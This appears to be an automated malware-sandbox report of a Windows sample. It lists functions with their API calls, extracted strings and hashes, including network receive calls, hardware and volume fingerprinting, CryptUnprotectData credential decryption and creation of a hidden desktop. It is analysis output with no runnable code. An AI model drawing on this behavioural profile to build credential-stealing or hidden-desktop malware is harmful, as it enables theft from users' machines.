                                                                          • Opcode ID: 5cc4eb5e4b6386c2a51c9cd8f332a102a19b47f6d16b1a283ae0c741d5588330
                                                                          • Instruction ID: de1964591e69464a22244bf0b8886e9f1ed56676511122637d9b9ba960c2b7db
                                                                          • Opcode Fuzzy Hash: 5cc4eb5e4b6386c2a51c9cd8f332a102a19b47f6d16b1a283ae0c741d5588330
                                                                          • Instruction Fuzzy Hash: 4793EBB4D052A88ADB65DF28D980BEDBBB5BF49344F0081DAD84DA7242DB716F84CF41

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • recv.WS2_32(?,00000004,00000002), ref: 00B67B41
                                                                          • recv.WS2_32(00000000,0000000C,00000002,00000000), ref: 00B67BC3
                                                                          • recv.WS2_32(00000000,0000000C,00000008), ref: 00B67BE4
                                                                          • recv.WS2_32(00000000,?,00000008,0F9C7D83), ref: 00B67C9B
                                                                          • recv.WS2_32(?,00000004,00000008), ref: 00B67DA3
                                                                          • __Xtime_get_ticks.LIBCPMT ref: 00B67DAA
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B67DB8
                                                                          • Sleep.KERNEL32(00000001,00000000,?,00002710,00000000,?,?,00000328,0000FFFF,00001006,?,00000008), ref: 00B67E31
                                                                          • Sleep.KERNEL32(00000064,?,00002710,00000000,?,?,00000328,0000FFFF,00001006,?,00000008), ref: 00B67E39
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: recv$Sleep$Unothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@
                                                                          • String ID:
                                                                          • API String ID: 3893897238-0
                                                                          • Opcode ID: f18164efd1e4c23bd0fc19fc65c07688faadd01d3e3fa9cb95c99efc6b500ccf
                                                                          • Instruction ID: 390cad3565a9c65534dfb3deef216d12d80cf222ff3341e5b5a416e9ad31d49e
                                                                          • Opcode Fuzzy Hash: f18164efd1e4c23bd0fc19fc65c07688faadd01d3e3fa9cb95c99efc6b500ccf
                                                                          • Instruction Fuzzy Hash: 65B1BCB1D04308DBEB20DBA8CC89BADBBF5FB44304F244259E454AB2E2DB795D45CB91

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 06B7A1E0: GetCurrentProcess.KERNEL32(00000000), ref: 06B7A1F4
                                                                            • Part of subcall function 06B7A1E0: IsWow64Process.KERNEL32(00000000), ref: 06B7A1FB
                                                                          • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,00000000,?,?,?), ref: 06B7A65B
                                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,00020019,?,00000400), ref: 06B7A7C5
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 06B7A83D
                                                                          • GetCurrentHwProfileA.ADVAPI32(?), ref: 06B7A97E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CurrentProcess$CloseOpenProfileQueryValueWow64
                                                                          • String ID: OguZ$qHBX$w9Y
                                                                          • API String ID: 165412945-770912372
                                                                          • Opcode ID: 77e16bbd9f21e1021b9d79eada268ba031558fe2498e33d01925989cd06fae9f
                                                                          • Instruction ID: fdca2285208a33507cae1949bf4a5710ba902e837c0bb2a92f25706d2db00eea
                                                                          • Opcode Fuzzy Hash: 77e16bbd9f21e1021b9d79eada268ba031558fe2498e33d01925989cd06fae9f
                                                                          • Instruction Fuzzy Hash: C1A2EFB4D092A88BDB66CB68D880BDDBBB1AF59304F1481DAD58CB7251EB305BC5CF50

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$no such vfs: %s$sqlite_rename_table
                                                                          • API String ID: 0-1885142750
                                                                          • Opcode ID: d49a50aac1026855318efb2d74c878f99e6a4e6c73b539f7320b64fd6cadb117
                                                                          • Instruction ID: 5f04d0dd98052c70119f0d45dae1415de297da4a3af9f755d3dc7dd5ca7736a8
                                                                          • Opcode Fuzzy Hash: d49a50aac1026855318efb2d74c878f99e6a4e6c73b539f7320b64fd6cadb117
                                                                          • Instruction Fuzzy Hash: 670239B0A007009BEF318F25ED85B6B7BE5EF40704F1444BCE85A9B691DBB1A985CBD1

                                                                          Control-flow graph (graph edge data omitted): entry block cca734; blocks call c52d5c, aa3350, c2dbd6 and RegOpenKeyExA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $OB4$2$Ml
                                                                          • API String ID: 0-3973776762
                                                                          • Opcode ID: b2f5596595071cb514f062753843ec3b8a1114e7ce4dfa9cd73ae750b2f3190a
                                                                          • Instruction ID: ab50a7dd4ecd55fc82389899ba21d9da3daa5764527af451e8855a1e962d6ae2
                                                                          • Opcode Fuzzy Hash: b2f5596595071cb514f062753843ec3b8a1114e7ce4dfa9cd73ae750b2f3190a
                                                                          • Instruction Fuzzy Hash: D3F169B8D052588BCB15CF98D9816DCBBF1AF4C364F645199E909BB311D7326E81CF28

                                                                          Control-flow graph (graph edge data omitted): entry block b66d00; blocks call ad39b3, ad2b99, aa8710, ad38de, ad3962, ad2534, abae80, ab63b0, b87440, cf3076, ad59b0, ad5270, b8a3a0, abab20, abad80, aa9280, aa2df0, ad2baa, ab8dc0, aa3040, aa8f20 and GetPEB
                                                                          APIs
                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00B66FD1
                                                                            • Part of subcall function 00AD2534: __EH_prolog3.LIBCMT ref: 00AD2570
                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 00B66FE2
                                                                            • Part of subcall function 00B87440: __fread_nolock.LIBCMT ref: 00B87589
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Cpp_errorThrow_std::_$H_prolog3__fread_nolock
                                                                          • String ID: default
                                                                          • API String ID: 2257151541-3814588639
                                                                          • Opcode ID: 8a31def34abd79659741a29a9c32a2625f0101241a6069c8dd4d7402b9d7a8d9
                                                                          • Instruction ID: 37df887776967eaec7fbd96158975f64c4a2e624b8fc91b2c17593b59eb8dd7d
                                                                          • Opcode Fuzzy Hash: 8a31def34abd79659741a29a9c32a2625f0101241a6069c8dd4d7402b9d7a8d9
                                                                          • Instruction Fuzzy Hash: 81328BB0D04248DFCB14DFA8D9917AEBBB1FF49304F144199E805AB392DB35AE45CB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: 734fd8848a698397c40c939b87f2535ec640e059f9caa507f190bd1ed66b8409
                                                                          • Instruction ID: 5447c28000781f2cb8eed5cd283a76d9a4aa77ed1687f71f78abea10ce8edbb7
                                                                          • Opcode Fuzzy Hash: 734fd8848a698397c40c939b87f2535ec640e059f9caa507f190bd1ed66b8409
                                                                          • Instruction Fuzzy Hash: 7FB26A70D00268CBDF24DF68D985BDDBBF5AF59300F1482D9E449AB282DB70AA85CF51

                                                                          Control-flow graph (graph edge data omitted): entry block 6b79080; blocks call 6ba0270, OpenDesktopA and CreateDesktopA
                                                                          APIs
                                                                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 06B790A3
                                                                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,06BEA928), ref: 06B79114
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Desktop$CreateOpen
                                                                          • String ID: HjDBKYOik35wJkl
                                                                          • API String ID: 153846745-2025202260
                                                                          • Opcode ID: 3ab38ddb7d999b1b7de8b76a46c87246154a4c65f99a47855c7767fb8fd3d472
                                                                          • Instruction ID: c82ade8350c6b81bf0abd7dd78278441093ad799530b112ccd33ee6ee8493d6f
                                                                          • Opcode Fuzzy Hash: 3ab38ddb7d999b1b7de8b76a46c87246154a4c65f99a47855c7767fb8fd3d472
                                                                          • Instruction Fuzzy Hash: 4311F3B4E45309AFDB54DF94C855BEEBBB1EB08300F104099E924BB380D3755A84CFA4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Ml$f3{;
                                                                          • API String ID: 0-3322000646
                                                                          • Opcode ID: 391ab683a56a9910ccf6cff184278876a5ae05fb62e59562a0b3bc28867fc9dc
                                                                          • Instruction ID: 5d2bbe2bb63d383470bb40d559f6f7ef0d241b227deb4a7eb301f13816791cc1
                                                                          • Opcode Fuzzy Hash: 391ab683a56a9910ccf6cff184278876a5ae05fb62e59562a0b3bc28867fc9dc
                                                                          • Instruction Fuzzy Hash: D4C20E74D092A88ADB65CF68C9807DDBBB1BF59300F1482DAD84DA7342DB756E84CF81
                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BDF635
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BDF937
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID:
                                                                          • API String ID: 885266447-0
                                                                          • Opcode ID: 0641082188072c5b6cc25b8187704670c62d77571534befa551f59583375e072
                                                                          • Instruction ID: ab56690d2baf09d98fbf2f7df9b6135c5293ddf9ee0ecdd9e7e41679fd99917d
                                                                          • Opcode Fuzzy Hash: 0641082188072c5b6cc25b8187704670c62d77571534befa551f59583375e072
                                                                          • Instruction Fuzzy Hash: C4024970A08643AFDB14CE28C850B7AF7E5FF88314F1486AAE85AC7750E774E955CB81
                                                                          APIs
                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,06BE102C,?,?), ref: 06B79B1E
                                                                            • Part of subcall function 06B797E0: std::exception::exception.LIBCMTD ref: 06B7981C
                                                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 06B79FE0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DirectoryInformationVolumeWindowsstd::exception::exception
                                                                          • String ID:
                                                                          • API String ID: 1347862782-0
                                                                          • Opcode ID: 0c0cfe9a0edcb9e2459260edbbc0dbaa9f355cb2effa041f03e9003446bd38bf
                                                                          • Instruction ID: 31c6c38204f988b537da95973dfa52e45d1d27b9ca062d937ea0cda3d255f751
                                                                          • Opcode Fuzzy Hash: 0c0cfe9a0edcb9e2459260edbbc0dbaa9f355cb2effa041f03e9003446bd38bf
                                                                          • Instruction Fuzzy Hash: FC3202B4D052A88BDB65CF68C881BEDFBB1AF59300F1481DAD988B7345EB305A85CF51
                                                                          APIs
                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00B66AD7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CryptDataUnprotect
                                                                          • String ID:
                                                                          • API String ID: 834300711-0
                                                                          • Opcode ID: dcddaf102aec610ed7e95c2bec9315d1e946bd80df37bfcb931f43f26ac1fe24
                                                                          • Instruction ID: 0a4072bc3ab69cd00a1afe1b385e7bd2f7be3ae236a3380bbff3a2e4c4f8af15
                                                                          • Opcode Fuzzy Hash: dcddaf102aec610ed7e95c2bec9315d1e946bd80df37bfcb931f43f26ac1fe24
                                                                          • Instruction Fuzzy Hash: D771C271C002489BDF10DFA8C945BEEFBB4EB05310F14826AE851B73D2EB395A44CBA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6b70000_file.jbxd
Yara matches
Similarity
• API ID: std::exception::exception
• String ID: 50500
• API String ID: 2807920213-2230786414
• Opcode ID: 880a0cf0a6dbb1133f1c10864de5cf1cf6c0d9754ad2a4865623d8d3f5f193dd
• Instruction ID: 7d2e1e2aa69ed0d05c5876d1a53448d7459dd2a14fac09b66b41a57171a7887e
• Opcode Fuzzy Hash: 880a0cf0a6dbb1133f1c10864de5cf1cf6c0d9754ad2a4865623d8d3f5f193dd
• Instruction Fuzzy Hash: 701223B4D042A88BDB65CFA8C980BEDFBB1AF59300F1081DAD949B7351EB305A85CF51
Strings
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID: %s|%s
• API String ID: 0-3399301454
• Opcode ID: b7ea23e8d205bc5776cf6eccce51b6ab343cc822aef2f50be55252757c1c1ee5
• Instruction ID: 363a3ff804e45b306eda3087bb5c14c16e864bf3b55378832e724a43c9b6e056
• Opcode Fuzzy Hash: b7ea23e8d205bc5776cf6eccce51b6ab343cc822aef2f50be55252757c1c1ee5
• Instruction Fuzzy Hash: F79169B1D00208DFDB14CFA4DC55BAEBBB5FF58700F104159E549AB292D770AA44CFA5

Control-flow Graph (graph image not reproduced; the function's API calls are listed below)

APIs
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00AFE1C2
• CreateDirectoryA.KERNEL32(?,00000000,?,-0000004C), ref: 00AFE353
• CreateDirectoryA.KERNEL32(?,00000000,00000000,?,?,?,-0000004C), ref: 00AFE446
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00AFE53C
• CreateDirectoryA.KERNEL32(?,00000000,00000000), ref: 00AFE788
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00AFE906
• CreateDirectoryA.KERNEL32(?,00000000,?,-0000004C), ref: 00AFEA9D
• CreateDirectoryA.KERNEL32(?,00000000,00000000,?,?,?,-0000004C), ref: 00AFEB90
  • Part of subcall function 00B86C20: GetLastError.KERNEL32(?,?,?,00B05C0F), ref: 00B86C87
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00AFEC86
  • Part of subcall function 00B86C20: std::_Throw_Cpp_error.LIBCPMT ref: 00B86CCF
  • Part of subcall function 00B86C20: std::_Throw_Cpp_error.LIBCPMT ref: 00B86CE0
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00AFED6D
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00AFEFED
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID: CreateDirectory$Cpp_errorThrow_std::_$ErrorLast
• String ID:
• API String ID: 411135664-0
• Opcode ID: 7e5989506ff2b3691bbd70515c789cdd06e333342af36e866d0ac98fa95be168
• Instruction ID: 0fb62c64328e8e64e98d7791c1d90a66cb796a7d820535f08f55f2d8c42ac67f
• Opcode Fuzzy Hash: 7e5989506ff2b3691bbd70515c789cdd06e333342af36e866d0ac98fa95be168
• Instruction Fuzzy Hash: 1AA211B0D042689BDB25EF64CD95BDDBBB8AF15304F0041E9E44AA7292EB305F88CF55

Control-flow Graph (graph image not reproduced; the function's API calls are listed below)

APIs
• WSAStartup.WS2_32(00000202,?), ref: 06B822AA
• getaddrinfo.WS2_32(FFFFFFFF,00000000,?,00000000), ref: 06B82300
• WSACleanup.WS2_32 ref: 06B8230F
Memory Dump Source
• Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6b70000_file.jbxd
Yara matches
Similarity
• API ID: CleanupStartupgetaddrinfo
• String ID:
• API String ID: 3142474549-0
• Opcode ID: d558220d1a3484c733a6b644d5da302136167b8cee31d9186fa03652cc3fd254
• Instruction ID: 7506f9d57b3b1b16a3595fe156e9fb684bf4c3754131d3fb8568fd496a1d905a
• Opcode Fuzzy Hash: d558220d1a3484c733a6b644d5da302136167b8cee31d9186fa03652cc3fd254
• Instruction Fuzzy Hash: CA41CBB4D04208EFDB24EFA8D558AEDBBB5FB48324F108699E525A73C0D7349A41CF94
APIs
  • Part of subcall function 00B86C20: GetLastError.KERNEL32(?,?,?,00B05C0F), ref: 00B86C87
  • Part of subcall function 00B86B90: CreateDirectoryA.KERNEL32(?,00000000,00B03997), ref: 00B86BD5
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00B05C30
• CreateDirectoryA.KERNEL32(?,00000000,00000000), ref: 00B05F55
  • Part of subcall function 00B86C20: std::_Throw_Cpp_error.LIBCPMT ref: 00B86CCF
  • Part of subcall function 00B86C20: std::_Throw_Cpp_error.LIBCPMT ref: 00B86CE0
• CreateDirectoryA.KERNEL32(?,00000000,00000000), ref: 00B05E46
Strings
Memory Dump Source
• Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_aa0000_file.jbxd
Yara matches
Similarity
• API ID: CreateDirectory$Cpp_errorThrow_std::_$ErrorLast
• String ID: h-o$h-o
• API String ID: 411135664-2901039896
• Opcode ID: e4eb5ecf88f6856fa902448d33b09e9ff6c0c1f39a40f41fee5bd0762f6163ea
• Instruction ID: 1d7fdbf65a1d24df22465f38682c17073d5ba99d4c05b338335817db0a6a2f96
• Opcode Fuzzy Hash: e4eb5ecf88f6856fa902448d33b09e9ff6c0c1f39a40f41fee5bd0762f6163ea
• Instruction Fuzzy Hash: FC53CCB0D052689FDB69DF24CD94BDDBBB4AB59300F4041EAE40AA7292DB306F84CF51

Control-flow Graph (graph image not reproduced; the function's API calls are listed below)

APIs
• __RTC_Initialize.LIBCMT ref: 06BB59B3
• ___scrt_uninitialize_crt.LIBCMT ref: 06BB59CD
Memory Dump Source
• Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6b70000_file.jbxd
Yara matches
Similarity
• API ID: Initialize___scrt_uninitialize_crt
• String ID:
• API String ID: 2442719207-0
• Opcode ID: 0e7c521b086f9d1edab9f55f02113ec5244f1f8770521c60fab360b996814117
• Instruction ID: ead39fba5d1b82f826588992841b71e4d88606aba5670a96be1eca360dc6346a
• Opcode Fuzzy Hash: 0e7c521b086f9d1edab9f55f02113ec5244f1f8770521c60fab360b996814117
• Instruction Fuzzy Hash: B241B0F3D10618AFEBF1AF65CC80BFE7A65EB44650F046095E9256B150D7F08D018FA2

Control-flow Graph (graph image not reproduced; no external API calls were recorded for this function)

APIs
Memory Dump Source
• Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
Joe Sandbox IDA Plugin
